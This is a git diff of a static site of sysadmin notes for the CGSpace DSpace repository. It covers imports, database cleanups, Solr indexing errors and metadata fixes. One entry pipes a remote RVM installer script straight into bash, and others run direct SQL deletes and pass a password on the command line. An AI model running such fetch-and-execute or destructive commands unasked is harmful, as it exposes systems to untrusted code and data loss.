<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 /home/cgspace.cgiar.org/bin/dspace oai import -c
...
58700 items imported so far...
@ -326,14 +326,14 @@ sys 1m29.310s
<li>One thing we need to remember if we start using OAI is to enable the autostart of the harvester process (see <code>harvester.autoStart</code> in <code>dspace/config/modules/oai.cfg</code>)</li>
<li>Error when running DSpace cleanup task on DSpace Test and CGSpace (on the same item), I need to look this up:</li>
</ul>
<pre><code>Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(435) is still referenced from table &quot;bundle&quot;.
<pre tabindex="0"><code>Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(435) is still referenced from table &#34;bundle&#34;.
</code></pre><h2 id="2017-04-18">2017-04-18</h2>
<ul>
<li>Helping Tsega test his new <a href="https://github.com/ilri/ckm-cgspace-rest-api">CGSpace REST API Rails app</a> on DSpace Test</li>
<li>Setup and run with:</li>
</ul>
<pre><code>$ git clone https://github.com/ilri/ckm-cgspace-rest-api.git
<pre tabindex="0"><code>$ git clone https://github.com/ilri/ckm-cgspace-rest-api.git
$ cd ckm-cgspace-rest-api/app
$ gem install bundler
$ bundle
@ -342,12 +342,12 @@ $ rails -s
</code></pre><ul>
<li>I used Ansible to create a PostgreSQL user that only has <code>SELECT</code> privileges on the tables it needs:</li>
</ul>
<pre><code>$ ansible linode02 -u aorth -b --become-user=postgres -K -m postgresql_user -a 'db=database name=username password=password priv=CONNECT/item:SELECT/metadatavalue:SELECT/metadatafieldregistry:SELECT/metadataschemaregistry:SELECT/collection:SELECT/handle:SELECT/bundle2bitstream:SELECT/bitstream:SELECT/bundle:SELECT/item2bundle:SELECT state=present
<pre tabindex="0"><code>$ ansible linode02 -u aorth -b --become-user=postgres -K -m postgresql_user -a &#39;db=database name=username password=password priv=CONNECT/item:SELECT/metadatavalue:SELECT/metadatafieldregistry:SELECT/metadataschemaregistry:SELECT/collection:SELECT/handle:SELECT/bundle2bitstream:SELECT/bitstream:SELECT/bundle:SELECT/item2bundle:SELECT state=present
</code></pre><ul>
<li>Need to look into <a href="https://github.com/puma/puma/blob/master/docs/systemd.md">running this via systemd</a></li>
<li>This is interesting for creating runnable commands from <code>bundle</code>:</li>
</ul>
<pre><code>$ bundle binstubs puma --path ./sbin
<pre tabindex="0"><code>$ bundle binstubs puma --path ./sbin
</code></pre><h2 id="2017-04-19">2017-04-19</h2>
<ul>
<li>Usman sent another link to their OAI interface, where the country names are now capitalized: <a href="https://data.cifor.org/dspace/oai/cgiar?verb=GetRecord&amp;metadataPrefix=dim&amp;identifier=oai:data.cifor.org:11463/947">https://data.cifor.org/dspace/oai/cgiar?verb=GetRecord&amp;metadataPrefix=dim&amp;identifier=oai:data.cifor.org:11463/947</a></li>
@ -360,15 +360,15 @@ $ rails -s
<li>Looking at 933 CIAT records from Sisay, he&rsquo;s having problems creating a SAF bundle to import to DSpace Test</li>
<li>I started by looking at his CSV in OpenRefine, and I see there a <em>bunch</em> of fields with whitespace issues that I cleaned up:</li>
</ul>
<pre><code>value.replace(&quot; ||&quot;,&quot;||&quot;).replace(&quot;|| &quot;,&quot;||&quot;).replace(&quot; || &quot;,&quot;||&quot;)
<pre tabindex="0"><code>value.replace(&#34; ||&#34;,&#34;||&#34;).replace(&#34;|| &#34;,&#34;||&#34;).replace(&#34; || &#34;,&#34;||&#34;)
</code></pre><ul>
<li>Also, all the filenames have spaces and URL encoded characters in them, so I decoded them from URL encoding:</li>
</ul>
<pre><code>unescape(value,&quot;url&quot;)
<pre tabindex="0"><code>unescape(value,&#34;url&#34;)
</code></pre><ul>
<li>Then create the filename column using the following transform from URL:</li>
</ul>
<pre><code>value.split('/')[-1].replace(/#.*$/,&quot;&quot;)
<pre tabindex="0"><code>value.split(&#39;/&#39;)[-1].replace(/#.*$/,&#34;&#34;)
</code></pre><ul>
<li>The <code>replace</code> part is because some URLs have an anchor like <code>#page=14</code> which we obviously don&rsquo;t want on the filename</li>
<li>Also, we need to only use the PDF on the item corresponding with page 1, so we don&rsquo;t end up with literally hundreds of duplicate PDFs</li>
@ -381,7 +381,7 @@ $ rails -s
<li>Looking at the CIAT data again, a bunch of items have metadata values ending in <code>||</code>, which might cause blank fields to be added at import time</li>
<li>Cleaning them up with OpenRefine:</li>
</ul>
<pre><code>value.replace(/\|\|$/,&quot;&quot;)
<pre tabindex="0"><code>value.replace(/\|\|$/,&#34;&#34;)
</code></pre><ul>
<li>Working with the CIAT data in OpenRefine to remove the filename column from all but the first item which requires a particular PDF, as there are many items pointing to the same PDF, which would cause hundreds of duplicates to be added if we included them in the SAF bundle</li>
<li>I did some massaging in OpenRefine, flagging duplicates with stars and flags, then filtering and removing the filenames of those items</li>
@ -391,15 +391,15 @@ $ rails -s
<li>Also there are loads of whitespace errors in almost every field, so I trimmed leading/trailing whitespace</li>
<li>Unbelievable, there are also metadata values like:</li>
</ul>
<pre><code>COLLETOTRICHUM LINDEMUTHIANUM|| FUSARIUM||GERMPLASM
<pre tabindex="0"><code>COLLETOTRICHUM LINDEMUTHIANUM|| FUSARIUM||GERMPLASM
</code></pre><ul>
<li>Add a description to the file names using:</li>
</ul>
<pre><code>value + &quot;__description:&quot; + cells[&quot;dc.type&quot;].value
<pre tabindex="0"><code>value + &#34;__description:&#34; + cells[&#34;dc.type&#34;].value
</code></pre><ul>
<li>Test import of 933 records:</li>
</ul>
<pre><code>$ [dspace]/bin/dspace import -a -e aorth@mjanja.ch -c 10568/87193 -s /home/aorth/src/CIAT-Books/SimpleArchiveFormat/ -m /tmp/ciat
<pre tabindex="0"><code>$ [dspace]/bin/dspace import -a -e aorth@mjanja.ch -c 10568/87193 -s /home/aorth/src/CIAT-Books/SimpleArchiveFormat/ -m /tmp/ciat
$ wc -l /tmp/ciat
933 /tmp/ciat
</code></pre><ul>
@ -409,21 +409,21 @@ $ wc -l /tmp/ciat
<li>More work on Ansible infrastructure stuff for Tsega&rsquo;s CKM DSpace REST API</li>
<li>I&rsquo;m going to start re-processing all the PDF thumbnails on CGSpace, one community at a time:</li>
</ul>
<pre><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m&quot;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace filter-media -f -v -i 10568/71249 -p &quot;ImageMagick PDF Thumbnail&quot; -v &gt;&amp; /tmp/filter-media-cmyk.txt
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace filter-media -f -v -i 10568/71249 -p &#34;ImageMagick PDF Thumbnail&#34; -v &gt;&amp; /tmp/filter-media-cmyk.txt
</code></pre><h2 id="2017-04-22">2017-04-22</h2>
<ul>
<li>Someone on the dspace-tech mailing list responded with a suggestion about the foreign key violation in the <code>cleanup</code> task</li>
<li>The solution is to remove the ID (ie set to NULL) from the <code>primary_bitstream_id</code> column in the <code>bundle</code> table</li>
<li>After doing that and running the <code>cleanup</code> task again I find more bitstreams that are affected and end up with a long list of IDs that need to be fixed:</li>
</ul>
<pre><code>dspace=# update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (435, 1136, 1132, 1220, 1236, 3002, 3255, 5322);
<pre tabindex="0"><code>dspace=# update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (435, 1136, 1132, 1220, 1236, 3002, 3255, 5322);
</code></pre><h2 id="2017-04-24">2017-04-24</h2>
<ul>
<li>Two users mentioned some items they recently approved not showing up in the search / XMLUI</li>
<li>I looked at the logs from yesterday and it seems the Discovery indexing has been crashing:</li>
</ul>
<pre><code>2017-04-24 00:00:15,578 INFO com.atmire.dspace.discovery.AtmireSolrService @ Processing (55 of 58853): 70590
<pre tabindex="0"><code>2017-04-24 00:00:15,578 INFO com.atmire.dspace.discovery.AtmireSolrService @ Processing (55 of 58853): 70590
2017-04-24 00:00:15,586 INFO com.atmire.dspace.discovery.AtmireSolrService @ Processing (56 of 58853): 74507
2017-04-24 00:00:15,614 ERROR com.atmire.dspace.discovery.AtmireSolrService @ this IndexWriter is closed
org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: this IndexWriter is closed
@ -447,7 +447,7 @@ org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: this Index
</code></pre><ul>
<li>Looking at the past few days of logs, it looks like the indexing process started crashing on 2017-04-20:</li>
</ul>
<pre><code># grep -c 'IndexWriter is closed' [dspace]/log/dspace.log.2017-04-*
<pre tabindex="0"><code># grep -c &#39;IndexWriter is closed&#39; [dspace]/log/dspace.log.2017-04-*
[dspace]/log/dspace.log.2017-04-01:0
[dspace]/log/dspace.log.2017-04-02:0
[dspace]/log/dspace.log.2017-04-03:0
@ -475,12 +475,12 @@ org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: this Index
</code></pre><ul>
<li>I restarted Tomcat and re-ran the discovery process manually:</li>
</ul>
<pre><code>[dspace]/bin/dspace index-discovery
<pre tabindex="0"><code>[dspace]/bin/dspace index-discovery
</code></pre><ul>
<li>Now everything is ok</li>
<li>Finally finished manually running the cleanup task over and over and null&rsquo;ing the conflicting IDs:</li>
</ul>
<pre><code>dspace=# update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (435, 1132, 1136, 1220, 1236, 3002, 3255, 5322, 5098, 5982, 5897, 6245, 6184, 4927, 6070, 4925, 6888, 7368, 7136, 7294, 7698, 7864, 10799, 10839, 11765, 13241, 13634, 13642, 14127, 14146, 15582, 16116, 16254, 17136, 17486, 17824, 18098, 22091, 22149, 22206, 22449, 22548, 22559, 22454, 22253, 22553, 22897, 22941, 30262, 33657, 39796, 46943, 56561, 58237, 58739, 58734, 62020, 62535, 64149, 64672, 66988, 66919, 76005, 79780, 78545, 81078, 83620, 84492, 92513, 93915);
<pre tabindex="0"><code>dspace=# update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (435, 1132, 1136, 1220, 1236, 3002, 3255, 5322, 5098, 5982, 5897, 6245, 6184, 4927, 6070, 4925, 6888, 7368, 7136, 7294, 7698, 7864, 10799, 10839, 11765, 13241, 13634, 13642, 14127, 14146, 15582, 16116, 16254, 17136, 17486, 17824, 18098, 22091, 22149, 22206, 22449, 22548, 22559, 22454, 22253, 22553, 22897, 22941, 30262, 33657, 39796, 46943, 56561, 58237, 58739, 58734, 62020, 62535, 64149, 64672, 66988, 66919, 76005, 79780, 78545, 81078, 83620, 84492, 92513, 93915);
</code></pre><ul>
<li>Now running the cleanup script on DSpace Test and already seeing 11GB freed from the assetstore—it&rsquo;s likely we haven&rsquo;t had a cleanup task complete successfully in years&hellip;</li>
</ul>
@ -489,12 +489,12 @@ org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: this Index
<li>Finally finished running the PDF thumbnail re-processing on CGSpace, the final count of CMYK PDFs is about 2751</li>
<li>Preparing to run the cleanup task on CGSpace, I want to see how many files are in the assetstore:</li>
</ul>
<pre><code># find [dspace]/assetstore/ -type f | wc -l
<pre tabindex="0"><code># find [dspace]/assetstore/ -type f | wc -l
113104
</code></pre><ul>
<li>Troubleshooting the Atmire Solr update process that runs at 3:00 AM every morning, after finishing at 100% it has this error:</li>
</ul>
<pre><code>[=================================================&gt; ]99% time remaining: 0 seconds. timestamp: 2017-04-25 09:07:12
<pre tabindex="0"><code>[=================================================&gt; ]99% time remaining: 0 seconds. timestamp: 2017-04-25 09:07:12
[=================================================&gt; ]99% time remaining: 0 seconds. timestamp: 2017-04-25 09:07:12
[=================================================&gt; ]99% time remaining: 0 seconds. timestamp: 2017-04-25 09:07:12
[=================================================&gt; ]99% time remaining: 0 seconds. timestamp: 2017-04-25 09:07:13
@ -557,7 +557,7 @@ Caused by: java.lang.ClassNotFoundException: org.dspace.statistics.content.DSpac
<li>The size of the CGSpace database dump went from 111MB to 96MB, not sure about actual database size though</li>
<li>Update RVM&rsquo;s Ruby from 2.3.0 to 2.4.0 on DSpace Test:</li>
</ul>
<pre><code>$ gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3
<pre tabindex="0"><code>$ gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3
$ \curl -sSL https://raw.githubusercontent.com/wayneeseguin/rvm/master/binscripts/rvm-installer | bash -s stable --ruby
... reload shell to get new Ruby
$ gem install sass -v 3.3.14
@ -585,15 +585,15 @@ $ gem install compass -v 1.0.3
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -7,7 +7,7 @@
<meta property="og:title" content="May, 2017" />
<meta property="og:description" content="2017-05-01 ICARDA apparently started working on CG Core on their MEL repository They have done a few cg.* fields, but not very consistent and even copy some of CGSpace items: https://mel.cgiar.org/xmlui/handle/20.500.11766/6911?show=full https://cgspace.cgiar.org/handle/10568/73683 2017-05-02 Atmire got back about the Workflow Statistics issue, and apparently it&rsquo;s a bug in the CUA module so they will send us a pull request 2017-05-04 Sync DSpace Test with database and assetstore from CGSpace Re-deploy DSpace Test with Atmire&rsquo;s CUA patch for workflow statistics, run system updates, and restart the server Now I can see the workflow statistics and am able to select users, but everything returns 0 items Megan says there are still some mapped items are not appearing since last week, so I forced a full index-discovery -b Need to remember to check if the collection has more items (currently 39 on CGSpace, but 118 on the freshly reindexed DSPace Test) tomorrow: https://cgspace." />
<meta property="og:description" content="2017-05-01 ICARDA apparently started working on CG Core on their MEL repository They have done a few cg.* fields, but not very consistent and even copy some of CGSpace items: https://mel.cgiar.org/xmlui/handle/20.500.11766/6911?show=full https://cgspace.cgiar.org/handle/10568/73683 2017-05-02 Atmire got back about the Workflow Statistics issue, and apparently it&rsquo;s a bug in the CUA module so they will send us a pull request 2017-05-04 Sync DSpace Test with database and assetstore from CGSpace Re-deploy DSpace Test with Atmire&rsquo;s CUA patch for workflow statistics, run system updates, and restart the server Now I can see the workflow statistics and am able to select users, but everything returns 0 items Megan says there are still some mapped items are not appearing since last week, so I forced a full index-discovery -b Need to remember to check if the collection has more items (currently 39 on CGSpace, but 118 on the freshly reindexed DSPace Test) tomorrow: https://cgspace." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2017-05/" />
<meta property="article:published_time" content="2017-05-01T16:21:52+02:00" />
@ -17,8 +17,8 @@
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="May, 2017"/>
<meta name="twitter:description" content="2017-05-01 ICARDA apparently started working on CG Core on their MEL repository They have done a few cg.* fields, but not very consistent and even copy some of CGSpace items: https://mel.cgiar.org/xmlui/handle/20.500.11766/6911?show=full https://cgspace.cgiar.org/handle/10568/73683 2017-05-02 Atmire got back about the Workflow Statistics issue, and apparently it&rsquo;s a bug in the CUA module so they will send us a pull request 2017-05-04 Sync DSpace Test with database and assetstore from CGSpace Re-deploy DSpace Test with Atmire&rsquo;s CUA patch for workflow statistics, run system updates, and restart the server Now I can see the workflow statistics and am able to select users, but everything returns 0 items Megan says there are still some mapped items are not appearing since last week, so I forced a full index-discovery -b Need to remember to check if the collection has more items (currently 39 on CGSpace, but 118 on the freshly reindexed DSPace Test) tomorrow: https://cgspace."/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="twitter:description" content="2017-05-01 ICARDA apparently started working on CG Core on their MEL repository They have done a few cg.* fields, but not very consistent and even copy some of CGSpace items: https://mel.cgiar.org/xmlui/handle/20.500.11766/6911?show=full https://cgspace.cgiar.org/handle/10568/73683 2017-05-02 Atmire got back about the Workflow Statistics issue, and apparently it&rsquo;s a bug in the CUA module so they will send us a pull request 2017-05-04 Sync DSpace Test with database and assetstore from CGSpace Re-deploy DSpace Test with Atmire&rsquo;s CUA patch for workflow statistics, run system updates, and restart the server Now I can see the workflow statistics and am able to select users, but everything returns 0 items Megan says there are still some mapped items are not appearing since last week, so I forced a full index-discovery -b Need to remember to check if the collection has more items (currently 39 on CGSpace, but 118 on the freshly reindexed DSPace Test) tomorrow: https://cgspace."/>
<meta name="generator" content="Hugo 0.133.1">
@ -48,12 +48,12 @@
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -100,7 +100,7 @@
<time datetime="2017-05-01T16:21:52+02:00">Mon May 01, 2017</time>
in
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/tags/notes/" rel="tag">Notes</a>
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
</p>
</header>
@ -131,7 +131,7 @@
<li>Discovered that CGSpace has ~700 items that are missing the <code>cg.identifier.status</code> field</li>
<li>Need to perhaps try using the &ldquo;required metadata&rdquo; curation task to find fields missing these items:</li>
</ul>
<pre><code>$ [dspace]/bin/dspace curate -t requiredmetadata -i 10568/1 -r - &gt; /tmp/curation.out
<pre tabindex="0"><code>$ [dspace]/bin/dspace curate -t requiredmetadata -i 10568/1 -r - &gt; /tmp/curation.out
</code></pre><ul>
<li>It seems the curation task dies when it finds an item which has missing metadata</li>
</ul>
@ -145,7 +145,7 @@
<ul>
<li>Testing one replacement for CCAFS Flagships (<code>cg.subject.ccafs</code>), first changed in the submission forms, and then in the database:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i ccafs-flagships-may7.csv -f cg.subject.ccafs -t correct -m 210 -d dspace -u dspace -p fuuu
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i ccafs-flagships-may7.csv -f cg.subject.ccafs -t correct -m 210 -d dspace -u dspace -p fuuu
</code></pre><ul>
<li>Also, CCAFS wants to re-order their flagships to prioritize the Phase II ones</li>
<li>Waiting for feedback from CCAFS, then I can merge <a href="https://github.com/ilri/DSpace/pull/320">#320</a></li>
@ -159,7 +159,7 @@
<li>This leads to tens of thousands of abandoned files in the assetstore, which need to be cleaned up using <code>dspace cleanup -v</code>, or else you&rsquo;ll run out of disk space</li>
<li>In the end I realized it&rsquo;s better to use submission mode (<code>-s</code>) to ingest the community object as a single AIP without its children, followed by each of the collections:</li>
</ul>
<pre><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx2048m -XX:-UseGCOverheadLimit&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx2048m -XX:-UseGCOverheadLimit&#34;
$ [dspace]/bin/dspace packager -s -o ignoreHandle=false -t AIP -e some@user.com -p 10568/87775 /home/aorth/10947-1/10947-1.zip
$ for collection in /home/aorth/10947-1/COLLECTION@10947-*; do [dspace]/bin/dspace packager -s -o ignoreHandle=false -t AIP -e some@user.com -p 10947/1 $collection; done
$ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager -r -f -u -t AIP -e some@user.com $item; done
@ -184,13 +184,13 @@ $ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager
<li>The CGIAR Library metadata has some blank metadata values, which leads to <code>|||</code> in the Discovery facets</li>
<li>Clean these up in the database using:</li>
</ul>
<pre><code>dspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and text_value=&#39;&#39;;
</code></pre><ul>
<li>I ended up running into issues during data cleaning and decided to wipe out the entire community and re-sync DSpace Test assetstore and database from CGSpace rather than waiting for the cleanup task to clean up</li>
<li>Hours into the re-ingestion I ran into more errors, and had to erase everything and start over <em>again</em>!</li>
<li>Now, no matter what I do I keep getting foreign key errors&hellip;</li>
</ul>
<pre><code>Caused by: org.postgresql.util.PSQLException: ERROR: duplicate key value violates unique constraint &quot;handle_pkey&quot;
<pre tabindex="0"><code>Caused by: org.postgresql.util.PSQLException: ERROR: duplicate key value violates unique constraint &#34;handle_pkey&#34;
Detail: Key (handle_id)=(80928) already exists.
</code></pre><ul>
<li>I think those errors actually come from me running the <code>update-sequences.sql</code> script while Tomcat/DSpace are running</li>
@ -202,7 +202,7 @@ $ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager
<li>I clarified that the scope of the implementation should be that ORCIDs are stored in the database and exposed via REST / API like other fields</li>
<li>Finally finished importing all the CGIAR Library content, final method was:</li>
</ul>
<pre><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx3072m -XX:-UseGCOverheadLimit&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx3072m -XX:-UseGCOverheadLimit&#34;
$ [dspace]/bin/dspace packager -r -a -t AIP -o skipIfParentMissing=true -e some@user.com -p 10568/80923 /home/aorth/10947-2517/10947-2517.zip
$ [dspace]/bin/dspace packager -r -a -t AIP -o skipIfParentMissing=true -e some@user.com -p 10568/80923 /home/aorth/10947-2515/10947-2515.zip
$ [dspace]/bin/dspace packager -r -a -t AIP -o skipIfParentMissing=true -e some@user.com -p 10568/80923 /home/aorth/10947-2516/10947-2516.zip
@ -215,7 +215,7 @@ $ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager
<li>The <code>-XX:-UseGCOverheadLimit</code> JVM option helps with some issues in large imports</li>
<li>After this I ran the <code>update-sequences.sql</code> script (with Tomcat shut down), and cleaned up the 200+ blank metadata records:</li>
</ul>
<pre><code>dspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and text_value=&#39;&#39;;
</code></pre><h2 id="2017-05-13">2017-05-13</h2>
<ul>
<li>After quite a bit of troubleshooting with importing cleaned up data as CSV, it seems that there are actually <a href="https://en.wikipedia.org/wiki/Null_character">NUL</a> characters in the <code>dc.description.abstract</code> field (at least) on the lines where CSV importing was failing</li>
@ -230,7 +230,7 @@ $ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager
<li>Merge changes to CCAFS project identifiers and flagships: <a href="https://github.com/ilri/DSpace/pull/320">#320</a></li>
<li>Run updates for CCAFS flagships on CGSpace:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/ccafs-flagships-may7.csv -f cg.subject.ccafs -t correct -m 210 -d dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/ccafs-flagships-may7.csv -f cg.subject.ccafs -t correct -m 210 -d dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>
<p>These include:</p>
@ -258,19 +258,19 @@ $ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager
<ul>
<li>Looking into the error I get when trying to create a new collection on DSpace Test:</li>
</ul>
<pre><code>ERROR: duplicate key value violates unique constraint &quot;handle_pkey&quot; Detail: Key (handle_id)=(84834) already exists.
<pre tabindex="0"><code>ERROR: duplicate key value violates unique constraint &#34;handle_pkey&#34; Detail: Key (handle_id)=(84834) already exists.
</code></pre><ul>
<li>I tried updating the sequences a few times, with Tomcat running and stopped, but it hasn&rsquo;t helped</li>
<li>It appears item with <code>handle_id</code> 84834 is one of the imported CGIAR Library items:</li>
</ul>
<pre><code>dspace=# select * from handle where handle_id=84834;
<pre tabindex="0"><code>dspace=# select * from handle where handle_id=84834;
handle_id | handle | resource_type_id | resource_id
-----------+------------+------------------+-------------
84834 | 10947/1332 | 2 | 87113
</code></pre><ul>
<li>Looks like the max <code>handle_id</code> is actually much higher:</li>
</ul>
<pre><code>dspace=# select * from handle where handle_id=(select max(handle_id) from handle);
<pre tabindex="0"><code>dspace=# select * from handle where handle_id=(select max(handle_id) from handle);
handle_id | handle | resource_type_id | resource_id
-----------+----------+------------------+-------------
86873 | 10947/99 | 2 | 89153
@ -279,7 +279,7 @@ $ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager
<li>I&rsquo;ve posted on the dspace-test mailing list to see if I can just manually set the <code>handle_seq</code> to that value</li>
<li>Actually, it seems I can manually set the handle sequence using:</li>
</ul>
<pre><code>dspace=# select setval('handle_seq',86873);
<pre tabindex="0"><code>dspace=# select setval(&#39;handle_seq&#39;,86873);
</code></pre><ul>
<li>After that I can create collections just fine, though I&rsquo;m not sure if it has other side effects</li>
</ul>
@ -294,31 +294,31 @@ $ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager
<li>Do some cleanups of community and collection names in CGIAR System Management Office community on DSpace Test, as well as move some items as Peter requested</li>
<li>Peter wanted a list of authors in here, so I generated a list of collections using the &ldquo;View Source&rdquo; on each community and this hacky awk:</li>
</ul>
<pre><code>$ grep 10947/ /tmp/collections | grep -v cocoon | awk -F/ '{print $3&quot;/&quot;$4}' | awk -F\&quot; '{print $1}' | vim -
<pre tabindex="0"><code>$ grep 10947/ /tmp/collections | grep -v cocoon | awk -F/ &#39;{print $3&#34;/&#34;$4}&#39; | awk -F\&#34; &#39;{print $1}&#39; | vim -
</code></pre><ul>
<li>Then I joined them together and ran this old SQL query from the dspace-tech mailing list which gives you authors for items in those collections:</li>
</ul>
<pre><code>dspace=# select distinct text_value
<pre tabindex="0"><code>dspace=# select distinct text_value
from metadatavalue
where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author')
where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;)
AND resource_type_id = 2
AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10947/2', '10947/3', '10947/1
0', '10947/4', '10947/5', '10947/6', '10947/7', '10947/8', '10947/9', '10947/11', '10947/25', '10947/12', '10947/26', '10947/27', '10947/28', '10947/29', '109
47/30', '10947/13', '10947/14', '10947/15', '10947/16', '10947/31', '10947/32', '10947/33', '10947/34', '10947/35', '10947/36', '10947/37', '10947/17', '10947
/18', '10947/38', '10947/19', '10947/39', '10947/40', '10947/41', '10947/42', '10947/43', '10947/2512', '10947/44', '10947/20', '10947/21', '10947/45', '10947
/46', '10947/47', '10947/48', '10947/49', '10947/22', '10947/23', '10947/24', '10947/50', '10947/51', '10947/2518', '10947/2776', '10947/2790', '10947/2521',
'10947/2522', '10947/2782', '10947/2525', '10947/2836', '10947/2524', '10947/2878', '10947/2520', '10947/2523', '10947/2786', '10947/2631', '10947/2589', '109
47/2519', '10947/2708', '10947/2526', '10947/2871', '10947/2527', '10947/4467', '10947/3457', '10947/2528', '10947/2529', '10947/2533', '10947/2530', '10947/2
531', '10947/2532', '10947/2538', '10947/2534', '10947/2540', '10947/2900', '10947/2539', '10947/2784', '10947/2536', '10947/2805', '10947/2541', '10947/2535'
, '10947/2537', '10568/93761')));
AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10947/2&#39;, &#39;10947/3&#39;, &#39;10947/1
0&#39;, &#39;10947/4&#39;, &#39;10947/5&#39;, &#39;10947/6&#39;, &#39;10947/7&#39;, &#39;10947/8&#39;, &#39;10947/9&#39;, &#39;10947/11&#39;, &#39;10947/25&#39;, &#39;10947/12&#39;, &#39;10947/26&#39;, &#39;10947/27&#39;, &#39;10947/28&#39;, &#39;10947/29&#39;, &#39;109
47/30&#39;, &#39;10947/13&#39;, &#39;10947/14&#39;, &#39;10947/15&#39;, &#39;10947/16&#39;, &#39;10947/31&#39;, &#39;10947/32&#39;, &#39;10947/33&#39;, &#39;10947/34&#39;, &#39;10947/35&#39;, &#39;10947/36&#39;, &#39;10947/37&#39;, &#39;10947/17&#39;, &#39;10947
